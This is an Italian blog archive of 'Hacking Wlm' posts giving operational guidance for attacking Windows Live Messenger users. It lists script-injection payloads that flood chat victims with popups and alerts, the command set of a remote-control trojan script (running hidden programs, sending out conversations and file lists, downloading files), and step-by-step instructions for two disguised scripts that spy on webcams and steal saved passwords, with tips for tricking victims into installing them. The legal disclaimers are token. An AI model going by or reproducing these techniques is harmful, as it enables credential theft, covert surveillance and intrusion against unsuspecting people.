Archivi per la categoria ‘Hacking Wlm’

Bug Presente Nelle Chat Di Groups




Ormai questo bug ormai conosciuto da due persone italiane,abbastanza importanti all’interno del Web Italiano,sta facendo il giro del mondo. Tutti sono a conoscenza del bug,tutti lo usano per scopi lucri e stupidi. Dopo aver letto alcuni articoli su di questo,ho provato anche io ad usarlo,ovviamente con successo il famoso ovviamente tutto questo all’interno delle chat del grande portale Groups. (Per chi non lo sapesse,il servizio Che regge le chat di gruppo Groups,permette di chattare piu persona in una stessa chat,come se fosse una chat di gruppo,adifferenza che Nelle chat Groups ci sono dei moderatori,e si possono personalizzare. E restano per sempre Tipo I Gruppi Di Messenger 2009). Il bug consiste che una persona portando con inganno a un’altro ad aprire il menù di controllo,egli potrà mandare dei codici,che gli permetteranno di fare delle azioni. Come ad esempio,aprire pagine Infinite Dal Web,oppure far comparire Infiniti Messaggi D’errore.

Dopo che si invieranno questi codici,la persona che ha ricevuto lo scherzetto da voi potrà benissimo capire,e copiare i codici da voi utilizzati. Poichè essi restano salvati e memorizzati ma sopratutto Visibili A Tutti all’interno della chat. Per questo si consiglia di utilizzare,come meglio credete essi.

  • Pagine Infinite:
  • >img src=”javascript: while(true){window.open(‘Www.lemonparty.org’,'MUAHAHAHAH’,'width=300,height=200,resizable=yes’)}”>

  • Sito Internet:
  • >img src=”javascript: function doRedirect() {location.href = “www.google.it”;}”>

  • Finestra Di Errore:
  • >img src=”vbscript: MsgBox(Puzzi, vbOk, Puzzi)”>

  • Finestra Di Errore Infinita:
  • >img src=”javascript: while(true){alert(‘Owned by Ex’)}”>

    Come Riportato Sopra,Consiglio A Tutte Quelle persone che hanno intenzione di usare questi codici per fare scherzetti o roba del genere,di usarli con attenzione ;) Comunque Ricordo Che Tutto L’articolo e a uso Informativo.

    MsnPlusBooster Script Per Il Controllo Remoto Attraverso MSN




    Dopo vari articoli dedicati ai vari addon di Messenger,ora è venuto il momento di uno su una cosa che piace tanto a molte persone,cioè l’hacking WLM.. Come sapete abbiamo parlato su Come Rubare Una Password Msn,Attraverso Uno Script e Come Spiare Una WebCam ma questo articolo sarà ancora più sconvolgente e curioso,poichè tratterà un argomento che sicuramente vi piacerà.. Cioè Su Come Controllare MSN Attraverso Il Controllo Remoto…Credo che non ci crederete ma tutto questo è realtà. Ormai quasi più nulla non è vero. Comunque tornando a noi,tutto questo è possibile grazie a un programmatore abbastanza noto all’interno del web,per i suoi script e programmi dedicati sempre al software Di Messenger che prende il nome di Vash91. Lo possiamo ricordare poichè era grafico del noto blog di msn Msntribe.it. Tornando allo script,esso per poter funzionare bisogna far installarlo alla vittima scelta (Con inganno o altro) quindi a questo punto potrete fare qualsiasi cosa vogliate. Ovviamente esistono dei comandi per svolgere varie opzioni all’interno del computer della vittima.


    * hide! = nasconde la chat
    * help! = mostra la lista di tutti i comandi disponibili
    * * testo = permette di sostituire il messaggio personale con uno scritto da voi (che ovviamente dovete sostituire a testo)
    * ** testo = sostituisce il messaggio personale e non ne permette la modifica (può essere disattivato con il comando *)
    * % testo = modifica il nickname
    * st numero (compreso tra 1 e 9) = modifca lo stato (2 = invisibile, 3 = in linea, 4 = occupato, 5 = torno subito, 7 = non al computer, 8 = al telefono, 9 = a pranzo)
    * & testo = crea un messaggio toast sul PC vittima con all’interno il vostro messaggio
    * info! = da informazioni sul contatto della vittima nonché la sua lista contatti :D
    * system! = da informazioni sul sistema operativo vittima
    * lockmsn! = blocca MSN (la vittima può sbloccarlo)
    * closemsn! = disconnette MSN
    * dis link = cambia l’immagine personale con quella nel link che mettete
    * op “contatto” = apre una conversazione con un contatto definito da voi (dev’essere per forza nella lista della vittima)
    * add “contatto” = aggiunge un contatto ma ha bisogno della notifica
    * ex programma = esegue un programma (es. ex cmd)
    * exh programma = esegue un programma senza mostrarlo
    * extract file = estrae un pacchetto rar nella cartella condivisa
    * create file = crea un file .bat con i comandi inviati allo script
    * Convo! = inserisce un pacchetto rar con le conversazioni fatte dalla vittima
    * Convo2! = crea un pacchetto rar con le conversazioni nella cartella dello script
    * send! = invia il pacchetto generato da Convo2! direttamente nella chat
    * close! = chiude la chat in corso (utile nel caso usiate il comando info)
    * close? = di predefinito lo script chiude la conversazione all’invio dei comandi, questa funzione attiva e disattiva questa funzione ed invia una risposta (onoff), che è visibile anche all’altro
    * send dir = invia il file in una directory scelta da voi
    * directory! = crea un file con tutta la lista dei file di sistema (utile in abbinazione con send)
    * dirsend! = invia il file creato da directory
    * dwn url = scarica un file da un url definito da voi
    * name testo = serve ad impostare il nome del file di destinazione del download (importante per far funzionare dwn)

    IMPORTANTE: Per Il corretto funzionamento degli script si consiglia di disattivare (Se è attivato sul vostro computer) lo script che permette la scrittura sfumata,poichè vengono contati anche i codici dei colori.

    Tutto questo ovviamente è scritto per scopo formativo,si consiglia di non far casini,ma solo di divertirsi con degli amici… ;)

    Download MsnPlusBooster

    SpiaWebcam: lo script per spiare le webcam altrui




    Se prima avevamo parlato dello script per rubare le password, ora vi stupirete ancora di più, perché con lo stesso sistema l’autore di quello script ne ha rilasciato anche un altro per spiare la webcam della vittima. Vi lasciamo alle istruzioni.

    Cos’è?
    Uno script che vi consentirà di spiare le vostre “vittime” attraverso le loro webcam. Scaricatelo qui.

    Come funziona?
    Preparazione dello script:
    1) Scarica lo script;
    2) Scegliere uno script falso da qui o crearne uno vuoto da qui;
    3) Unire i due script tramite questo;
    4) Lo script è pronto per essere spedito.

    Uso:
    1) Spedire lo script e farlo installare alla vittima (è anche possibile trasformare lo script in un eseguibile, da qui);
    2) Attendere il logout ed il successivo login della vittima;
    4) Inviare il comando vdwcio alla vittima;
    5) Accettare l’invito della ricezione del webcam del contatto (non è una videochiamata, è un invio della webcam);
    6) Una volta finito lo spionaggio mandare il messaggio vdwcso;
    7) Potrete ora tornare a parlare con la vittima.

    Nota bene
    - Con il comando vdwcro potrete far ricomparire la finestra di conversazione alla vittima per parlare; attenzione, la vittima così vedrà tutto;
    - Se viene chiusa la finestra di conversazione o viene interrotto l’invio della webcam la finestra di conversazione della vittima apparirà nuovamente, mostrando tutto, quindi attenzione.

    Ricordo che spiare le webcam consiste in un’invasione della privacy ed è quindi illegale. L’autore non si assume alcuna responsabilità dell’uso che fate di questa guida.

    Script e documentazione a cura di Suxsem

    Rubare password di MSN con uno script di Messenger Plus!




    Windows Live Messenger è forse il più usato instant messenger al mondo, e fa di lui una ghiotta preda per vendicativi o semplici hacker, che s’impegnano per scoprire che la sicurezza del programma non è proprio così alta. A decifrare o registrare le password di MSN su un computer locale non ci vuole molto (come spiegheremo nel prossimo articolo), ma a metterle in un file di testo e spedirle via e-mail o nella conversazione stessa ci vuole ancora meno, dipende tutto dall’ingenuità della vittima, che crederà di eseguire uno script utile e senza scopi malevoli.

    In quest’articolo tratteremo quindi su come rubare una password di MSN attraverso uno script di Messenger Plus. Ricordo che rubare password consiste in violazione della privacy e furto dei dati personali, ed è quindi illegale. L’articolo è solo a scopo informativo per discutere delle vulnerabilità di MSN, e l’autore non si assume alcuna responsabilità di come viene utilizzato.

    Lo script è stato ideato da Suxsem, e si chiama RubaPass. Il sistema si basa sull’invio di uno script alla vittima che, in caso di ordine dalla finestra di conversazione da parte dell’attacker, ruberà le password. Lo script maligno è mascherato sotto un altro utile script, KeyFlasher. Il metodo è stato provato in versioni antecedenti alla 2009, ma dovrebbe funzionare anche con essa, in quanto il metodo di registrazione di password non è cambiato. Lo script non risulta compatibile con Windows Vista o Windows 7.

    Usare lo script
    1) Installiamo sul nostro PC lo script rubaPass;
    2) Apriamo una conversazione con la vittima e dal menù dello script (accessibile tramite un pulsante con 3 cubetti posto vicino a quello per inviare trilli) scegliamo la voce “Invia keyFlasher”;
    3) Aspettiamo che la vittima accetti ed installi lo script (in caso la vittima non si fidi è possibile convertire lo script (non rubaPass…ma keyFlasher…contenuto in C:\Programmi\Messenger Plus! Live\Scripts\rubaPass) in eseguibile attraverso questa guida;
    4) Aspettiamo il logout ed il successivo login della vittima (aspettiamo che esca e rientri in MSN);
    5) Inviamo un messaggio qualunque alla vittima e aspettiamo il toast (messaggino in basso a destra al nostro schermo) che ci dirà quando è possibile proseguire (in ogni caso dopo 10 secondi circa);
    6) Scegliamo dal menù dello script la voce “Richiedi password”;
    7) Aspettiamo il messaggio “£nd” che uscirà nella finestra di conversazione e accettiamo tutti i file che ci vengono inviati;
    (Opzionale) E’ consigliabile inviare il comando “Inibisci keyFlasher remoto” accessibile dal menù dello script per trasformare lo script che avete inviato alla vittima da un sistema per fregargli la password ad un semplice script (vedi “Informazioni aggiuntive” sotto per saperne di più);
    9) Abbiamo finito (leggi sotto per sapere cosa fare con i file ricevuti)… sarà possibile tornare a parlare normalmente con la vittima solo dal suo prossimo accesso a Messenger;

    Analizzare i file ricevuti
    Se tutto è andato bene avremo ottenuto 2 file: msgXs.txt e msgXs.rbp.
    Entrambi andranno aperti con “Blocco note” di Windows.
    Il primo (msgXs.txt) contiene il testo digitato dalla vittima durante l’accesso a MSN (a meno che non l’abbia salvata, l’avrà digitata in quel momento per accedere e voi la riceverete; se ha la funzione salva password attiva questo file sarà vuoto);
    Il secondo /msgXs.rbp) contiene un elenco di tutte le password di MSN salvate sul PC col relativo indirizzo email;
    Sarà quindi possibile recuperare la password della vittima sia se essa ha la funzione salva password abilitata sia se la ha disabilitata.

    Informazioni aggiuntive
    1) Per non destare sospetti nella vittima lo script maligno che le invierete possiede anche alcune vere funzionalità… utili per la vittima. Per sapere a cosa serve il “falso” script puoi cliccare qui (in sintesi: fa lampeggiare i LED della tastiera quando si riceve un messaggio).
    2) Attraverso il comando “Invia descrizione keyFlasher” disponibile nel menù dello script è possibile inviare alla vittima (nel caso essa la chiedesse) una breve descrizione del “finto” script racchiuso nello script che gli invierete.
    3) Nel caso la vittima abbia già provato lo script keyFlasher originale potete sempre inventarvi che l’avete modificato e migliorato e volete un suo parere sul vostro lavoro.

    Script e documentazione a cura di Suxsem

    Statistiche


    Creative Commons License
    Newsletter
    Votaci
    http://www.wikio.it
    Geeknews!
    Top 100 Blog
    BlogItalia.it - La directory italiana dei blog
    Blog directory
    Internet Business Directory - BTS Local
    Archivio
    Banner